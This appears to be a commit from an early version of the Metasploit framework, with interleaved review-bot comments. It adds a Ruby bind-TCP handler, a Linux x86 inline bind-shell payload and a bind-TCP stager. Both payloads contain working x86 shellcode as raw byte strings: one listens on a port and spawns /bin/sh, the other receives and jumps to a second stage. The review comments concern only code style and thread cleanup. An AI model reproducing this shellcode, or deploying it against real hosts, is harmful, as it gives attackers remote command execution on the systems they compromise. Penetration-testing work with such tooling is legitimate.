bind tcp stager/inline for linux
git-svn-id: file:///home/svn/incoming/trunk@2776 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
46c2cd2ac1
commit
cc32a21386
@ -117,7 +117,7 @@ module Handler
# The amount of time to wait for a session to come in.
#
def wfs_delay
1
2
end
#
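--- /dev/null
+++ b/<PATH-NOT-SHOWN>
@@ -0,0 +1,112 @@
+module Msf
+module Handler
+
+###
+#
+# BindTcp
+# -------
+#
+# This module implements the Bind TCP handler. This means that
+# it will attempt to connect to a remote host on a given port for a period of
+# time (typically the duration of an exploit) to see if a the payload has
+# started listening. This can tend to be rather verbose in terms of traffic
+# and in general it is preferable to use reverse payloads.
+#
+###
+module BindTcp
+
+include Msf::Handler
+
+def self.handler_type
+return "bind_tcp"
+end
+
+def initialize(info = {})
+super
+
+register_options(
+[
+Opt::RHOST,
+Opt::LPORT(4444)
+], Msf::Handler::BindTcp)
+
+self.conn_threads = []
+end
+
+#
+# No setup to speak of
+#
+def setup_handler
+end
+
+#
+# Kills off the connection threads if there are any hanging around.
+#
+def cleanup_handler
+# Kill any remaining handle_connection threads that might
+# be hanging around
+conn_threads.each { |thr|
+thr.kill
+}
+end
+
+#
+# Starts monitoring for an outbound connection to become established.
+#
+def start_handler
+listener_thread = Thread.new {
+client = nil
+
+print_status("Started bind handler")
+
+# Keep trying to connect
+callcc { |ctx|
+while true
+begin
+client = Rex::Socket::Tcp.create(
+'PeerHost' => datastore['RHOST'],
+'PeerPort' => datastore['LPORT'].to_i,
+'Comm' => comm)
+rescue Rex::ConnectionRefused
+# Connection refused is a-okay
+rescue
+wlog("Exception caught in bind handler: #{$!}")
+end
+
+ctx.call if (client)
+
+# Wait a second before trying again
+Rex::ThreadSafe.sleep(0.5)
+end
+}
+
+# Valid client connection?
+if (client)
+# Start a new thread and pass the client connection
+# as the input and output pipe. Client's are expected
+# to implement the Stream interface.
+conn_threads << Thread.new {
+begin
+handle_connection(client)
+rescue
+elog("Exception raised from BindTcp.handle_connection: #{$!}")
+end
+}
+end
+}
+end
+
+#
+# Nothing to speak of.
+#
+def stop_handler
+end
+
+protected
+
+attr_accessor :conn_threads
+
+end
+
+end
+end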
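Review bot: The connect loop in start_handler can never be stopped once started: `listener_thread` is assigned but never stored, so cleanup_handler (which only kills conn_threads) and the empty stop_handler leave that thread polling RHOST:LPORT every half second after the handler is torn down. Keep a handle and kill it with the connection threads: `self.listener_thread = Thread.new {` in start_handler, `listener_thread.kill if (listener_thread)` in cleanup_handler, and `attr_accessor :conn_threads, :listener_thread` in the protected section. The comment `# Wait a second before trying again` also disagrees with `Rex::ThreadSafe.sleep(0.5)` just below it. The callcc/while-true pair exists only to leave the loop once `client` is set; a plain `loop do ... break if client ... end` expresses that without a continuation.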
@ -23,6 +23,13 @@ class Rex::Socket::Tcp < Rex::Socket
#
##
#
# Creates the client using the supplied hash
#
def self.create(hash)
self.create_param(Rex::Socket::Parameters.from_hash(hash))
end
#
# Wrapper around the base socket class' creation method that automatically
# sets the parameter's protocol to TCP
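--- /dev/null
+++ b/<PATH-NOT-SHOWN>
@@ -0,0 +1,44 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Linux
+module X86
+
+module ShellBindTcp
+
+include Msf::Payload::Single
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Linux Command Shell, Bind TCP Inline',
+'Version' => '$Revision$',
+'Description' => 'Listen for a connection and spawn a command shell',
+'Author' => [ 'skape', 'vlad902' ],
+'Platform' => 'linux',
+'Arch' => ARCH_X86,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShell,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 0x14, 'n' ],
+},
+'Payload' =>
+"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
+"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
+"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
+"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +
+"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
+"\x89\xe1\xcd\x80"
+}
+))
+end
+
+end
+
+end end end end end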
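Review bot: The last line of the file, `end end end end end`, closes five modules (Msf/Payloads/Singles/Linux/X86) at once, which makes the nesting hard to verify by eye; one `end` per line, mirroring the `module` lines, would match how the handler file in this commit is written. The stager file below ends with the same collapsed line. ShellBindTcp also has no `###`/`# BindTcp` header block like the one the stager carries; a short header such as `# Linux x86 inline payload: listens on LPORT and spawns a command shell, driven by Msf::Handler::BindTcp.` would bring the two files in line. 'Author' is an array here but a bare string in the stager; unless merge_info normalises both forms (not visible in this commit), the two should use the same shape.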
@ -8,7 +8,7 @@ module Singles
module Linux
module X86
module Shell
module ShellReverseTcp
include Msf::Payload::Single
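--- /dev/null
+++ b/<PATH-NOT-SHOWN>
@@ -0,0 +1,48 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+module Msf
+module Payloads
+module Stagers
+module Linux
+module X86
+
+###
+#
+# BindTcp
+# -------
+#
+# Linux bind TCP stager.
+#
+###
+module BindTcp
+
+include Msf::Payload::Stager
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Bind TCP Stager',
+'Version' => '$Revision$',
+'Description' => 'Listen for a connection',
+'Author' => 'skape',
+'Platform' => 'linux',
+'Arch' => ARCH_X86,
+'Handler' => Msf::Handler::BindTcp,
+'Stager' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 0x14, 'n' ],
+},
+'Payload' =>
+"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
+"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
+"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
+"\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
+}
+))
+end
+
+end
+
+end end end end end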